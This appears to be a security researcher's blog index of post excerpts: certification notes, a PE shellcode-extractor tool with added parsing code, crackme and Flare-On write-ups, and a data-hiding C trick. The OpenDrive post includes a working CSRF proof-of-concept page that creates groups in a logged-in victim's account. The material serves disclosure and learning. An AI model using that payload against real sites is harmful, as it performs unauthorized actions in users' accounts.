Last year I thought of getting certified in the field of web application security, since I hadn't done any certifications before. I researched the current certifications in the market and found out that most of them just involve answering a few MCQs and getting certified, but unfortunately those are highly accepted by different organizations. When it comes to the infosec industry, though, there are a bunch of good certifications I had in mind to complete someday. So considering my budget, time and resources, I thought of taking eLearnSecurity's eWPT certification. This certification is highly hands-on, with a fully practical penetration-test-based exam. In this industry it's hard to prove we know something, so I think I made the better choice by taking a certification in the field in which I have had experience since a small age. Apart from that, before I lose my teens I wanted to get certified 😉
Author: Osanda Malith Jayathissa
Shellcode Extractor
This tool extracts the opcodes from the .text section of a PE file and displays them in different hex formats for different syntaxes (C/Python-style "\x" strings, assembler db lines and so on). It works only with valid PE files. Coded in C++Builder XE5.
Download: https://github.com/OsandaMalith/ShellCode-Extractor/releases
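The core of such a tool is walking the PE headers to find the .text section's raw bytes and then rendering them. The following is an added example written for this page, not the Shellcode Extractor's own source: it parses a PE image held in memory (bounds-checking every header offset, since a malformed file is the obvious way to crash a parser like this), pulls out a named section and prints it in the "\xNN" form. The sample PE is constructed inline, a bare header skeleton with one 5-byte .text section, and is not a real or loadable binary.

```c
#include <stdint.h>
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* PE headers are little-endian on disk regardless of host; read and write
 * them byte-wise so the code is also correct on big-endian hosts. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Locate the raw file bytes of a named section in a PE image held in buf.
 * Returns a pointer into buf and sets *len, or NULL if the file is not a
 * well-formed PE or the section is absent.  Every header offset is
 * bounds-checked before use, so a crafted file cannot push reads outside buf. */
const uint8_t *pe_find_section(const uint8_t *buf, size_t size, const char *name, size_t *len)
{
    if (size < 0x40 || buf[0] != 'M' || buf[1] != 'Z') return NULL;
    uint32_t e_lfanew = rd32(buf + 0x3c);
    if (e_lfanew > size || size - e_lfanew < 24) return NULL; /* "PE\0\0" + IMAGE_FILE_HEADER */
    const uint8_t *nt = buf + e_lfanew;
    if (memcmp(nt, "PE\0\0", 4) != 0) return NULL;
    uint16_t nsec  = rd16(nt + 4 + 2);           /* IMAGE_FILE_HEADER.NumberOfSections */
    uint16_t optsz = rd16(nt + 4 + 16);          /* IMAGE_FILE_HEADER.SizeOfOptionalHeader */
    size_t off = (size_t)e_lfanew + 24 + optsz;  /* first IMAGE_SECTION_HEADER */
    for (uint16_t i = 0; i < nsec; i++, off += 40) {
        if (off > size || size - off < 40) return NULL;
        const uint8_t *sh = buf + off;
        if (strncmp((const char *)sh, name, 8) != 0) continue;  /* Name[8] */
        uint32_t raw_size = rd32(sh + 16);       /* SizeOfRawData */
        uint32_t raw_ptr  = rd32(sh + 20);       /* PointerToRawData */
        if (raw_ptr > size || size - raw_ptr < raw_size) return NULL;
        *len = raw_size;
        return buf + raw_ptr;
    }
    return NULL;
}

/* Render bytes in the "\xNN" escape form used for C/Python shellcode strings.
 * Returns the number of characters written, or 0 if out is too small. */
size_t hex_escape(const uint8_t *p, size_t len, char *out, size_t outsz)
{
    if (outsz < 4 * len + 1) return 0;
    size_t n = 0;
    for (size_t i = 0; i < len; i++) n += (size_t)sprintf(out + n, "\\x%02x", p[i]);
    out[n] = '\0';
    return n;
}

/* Constructed sample (not a real binary): a minimal 32-bit PE skeleton with
 * one ".text" section holding 5 bytes: push ebp; mov ebp,esp; ret; nop; nop.
 * Just enough header to exercise the parser; it is not a loadable image. */
uint8_t g_pe[0x400];
size_t build_sample_pe(void)
{
    static const uint8_t code[] = { 0x55, 0x8b, 0xec, 0xc3, 0x90 };
    memset(g_pe, 0, sizeof g_pe);
    g_pe[0] = 'M'; g_pe[1] = 'Z';
    wr32(g_pe + 0x3c, 0x80);                 /* e_lfanew */
    uint8_t *nt = g_pe + 0x80;
    memcpy(nt, "PE\0\0", 4);
    wr16(nt + 4, 0x014c);                    /* Machine = IMAGE_FILE_MACHINE_I386 */
    wr16(nt + 6, 1);                         /* NumberOfSections */
    wr16(nt + 20, 0xE0);                     /* SizeOfOptionalHeader (PE32) */
    wr16(nt + 24, 0x10b);                    /* OptionalHeader.Magic = PE32 */
    uint8_t *sh = nt + 24 + 0xE0;            /* first section header */
    memcpy(sh, ".text\0\0\0", 8);
    wr32(sh + 8, sizeof code);               /* VirtualSize */
    wr32(sh + 12, 0x1000);                   /* VirtualAddress */
    wr32(sh + 16, sizeof code);              /* SizeOfRawData */
    wr32(sh + 20, 0x200);                    /* PointerToRawData */
    memcpy(g_pe + 0x200, code, sizeof code);
    return sizeof g_pe;
}

int main(void)
{
    size_t len, size = build_sample_pe();
    const uint8_t *text = pe_find_section(g_pe, size, ".text", &len);
    if (!text) { fputs("no .text section\n", stderr); return 1; }
    char out[64];
    hex_escape(text, len, out, sizeof out);
    printf("%zu bytes: \"%s\"\n", len, out);  /* 5 bytes: "\x55\x8b\xec\xc3\x90" */
    return 0;
}
```

To run it against a real file, read the file into a buffer and pass it to pe_find_section in place of g_pe; note that SizeOfRawData is the file-aligned size, so the tail of the extracted block is usually alignment padding rather than code.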
2014 Flare On Challenge 2
You can download the challenge from here : http://www.flare-on.com/files/C2.zip
The zip file contains an HTML file and, inside the img folder, an image used as the logo of the HTML page.
If we open the image in a hex editor, we can see that PHP code has been appended after the end of the image data.
2014 Flare On Challenge 1
You can download the challenge from here: http://www.flare-on.com/files/C1.exe
When we run the application we get this.
When we click on Decode we get this encrypted string.
Hiding Data Inside Memory Addresses
This is a small finding I came across while experimenting with pointers in C. In C, arithmetic on pointers depends on the size of the pointed-to data type. If we declare an int variable, the compiler allocates 4 bytes for it on the usual 32- and 64-bit platforms. I assume you are well aware of these basics of C 🙂 I wanted to store data inside the otherwise unused bytes of the memory allocated for an int, that is, the bytes a small value like 100 never touches. This is a bit challenging in a high-level language; of course, with inline assembly I could have achieved it easily, but I wanted to do it using only native C operators.
To understand this, let's begin with a simple approach: two ints, each holding a value that fits in a single byte.
[code language="c"]
#include <stdio.h>

int main()
{
    /* Each value fits in one byte, yet each variable occupies four. */
    unsigned int var = 100;
    unsigned int var2 = 200;
    printf("%u\n", var);
    printf("%u\n", var2);
    return 0;
}
[/code]
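Carrying the idea through, here is an added example (written for this page, not code from the original post) that packs a string into the three unused bytes of each int while keeping the "real" one-byte value recoverable. It uses only a char-pointer view of the int, no inline assembly. Two caveats the worked version makes visible: the int's numeric value does change (those bytes are part of the value, so printf("%u") shows a large number and only v & 0xFF gives back 100), and which byte is the unused one depends on endianness, so the code finds the least-significant byte's position at run time instead of assuming x86. The slot values 100, 200, 50, 7 and the string "secret!!" are constructed sample data.

```c
#include <stdio.h>
#include <string.h>

/* Index of the least-significant byte of an unsigned int in memory:
 * 0 on little-endian hosts (x86), sizeof(int)-1 on big-endian ones.
 * Worked out at run time so the byte bookkeeping below is portable. */
static size_t low_byte_index(void)
{
    unsigned int probe = 1;
    return ((unsigned char *)&probe)[0] == 1 ? 0 : sizeof probe - 1;
}

/* The "real" value we are preserving: the low byte of v (100, 200, ... all
 * fit in one byte), read with a plain mask so it works on any endianness. */
unsigned int original_value(unsigned int v) { return v & 0xFFu; }

/* Write up to sizeof(int)-1 payload bytes into the bytes of *slot that a
 * one-byte value does not use, i.e. every byte except the least-significant.
 * Returns how many payload bytes were placed. */
size_t hide_in_int(unsigned int *slot, const unsigned char *payload, size_t n)
{
    unsigned char *bytes = (unsigned char *)slot;   /* char aliasing of any object is allowed */
    size_t low = low_byte_index(), placed = 0;
    for (size_t i = 0; i < sizeof *slot && placed < n; i++) {
        if (i == low) continue;                     /* leave the real value alone */
        bytes[i] = payload[placed++];
    }
    return placed;
}

/* Scatter the bytes of s (no terminating NUL) across the spare bytes of
 * nslots ints, 3 per int on a 4-byte-int platform.  Returns bytes that fit. */
size_t hide_string(unsigned int *slots, size_t nslots, const char *s)
{
    size_t len = strlen(s), done = 0;
    for (size_t k = 0; k < nslots && done < len; k++)
        done += hide_in_int(&slots[k], (const unsigned char *)s + done, len - done);
    return done;
}

/* Reverse of hide_string: walk the spare bytes in the same order and copy
 * n of them into out, then NUL-terminate.  out must hold n + 1 bytes. */
void recover_string(const unsigned int *slots, size_t nslots, char *out, size_t n)
{
    size_t low = low_byte_index(), got = 0;
    for (size_t k = 0; k < nslots && got < n; k++) {
        const unsigned char *bytes = (const unsigned char *)&slots[k];
        for (size_t i = 0; i < sizeof slots[k] && got < n; i++)
            if (i != low) out[got++] = (char)bytes[i];
    }
    out[got] = '\0';
}

int main(void)
{
    unsigned int var[4] = { 100, 200, 50, 7 };   /* constructed sample values */
    char out[16];
    size_t hidden = hide_string(var, 4, "secret!!");
    recover_string(var, 4, out, hidden);
    for (size_t k = 0; k < 4; k++)
        printf("var[%zu] = %u (low byte %u)\n", k, var[k], original_value(var[k]));
    printf("recovered: %s\n", out);             /* recovered: secret!! */
    return 0;
}
```

Anything that consumes var[] as a plain number will now see the packed bytes, so this only stays invisible to code that, like original_value here, looks at the low byte alone.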
2015 in review
The WordPress.com stats helper monkeys prepared a 2015 annual report for this blog.
Here’s an excerpt:
Madison Square Garden can seat 20,000 people for a concert. This blog was viewed about 69,000 times in 2015. If it were a concert at Madison Square Garden, it would take about 3 sold-out performances for that many people to see it.
Rootme No software breakpoints Cracking Challenge
Here is another very interesting challenge from Root-Me. The title says "ELF – no software breakpoints".
Let's run the file command and see.
[code language="bash"]
% file ch20.bin
ch20.bin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
[/code]
The executable is stripped, so there are no symbol names to lean on.
Next I examined the sections in the file; the .text section starts at 0x08048080.
This is the disassembly of the .text section. I spent some time trying to understand the logic. Well, let's see what this is 🙂
Pwning OpenDrive Users
After a long time away from bug hunting, I randomly found these few bugs in the OpenDrive.com website.
XSRF in Creating Groups
If the attacker can get the victim to run this code while logged in, he can create his own groups in the user's Groups section. The POST body is form-urlencoded, a CORS-safelisted content type, so the browser sends it cross-origin without a preflight, and withCredentials makes it attach the victim's OpenDrive session cookies. This is the proof of concept; you will see groups such as "pwned" being created.
[code language="html"]
<html>
<!-- Discovered by @OsandaMalith -->
<body>
<script>
function submitRequest()
{
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "https://www.opendrive.com/ajax", true);
  // All three headers are CORS-safelisted, so no preflight is triggered.
  xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
  // Send the victim's OpenDrive cookies with the cross-origin request.
  xhr.withCredentials = true;
  var body = "action=create-usergroup&group_name=pwned&group_max_storage=5120&group_bw_max=1024";
  // Ship the body as a raw byte Blob so it goes out exactly as written.
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
  <input type="button" value="Click Here to Pwn" onclick="submitRequest();" />
</form>
</body>
</html>
[/code]
Newbie Keygenning 1
This is a random, very old crackme I found when I was bored with assignments; it is pretty easy and I thought of sharing it with you. Doing crackmes one by one 😀 Download: https://www.mediafire.com/?351rp7o9qmf97js
After opening it in Olly (OllyDbg) and checking the string references, we can see the congratulations string.
After following the string, we see the following disassembly.
Informatica Reflected XSS
This is an old vulnerability I found in Informatica that got fixed recently. Honestly, I've been a bit away from bug hunting due to studies and all. Well, stay tuned: I found some cool bugs in a few sites and products and will disclose them shortly 🙂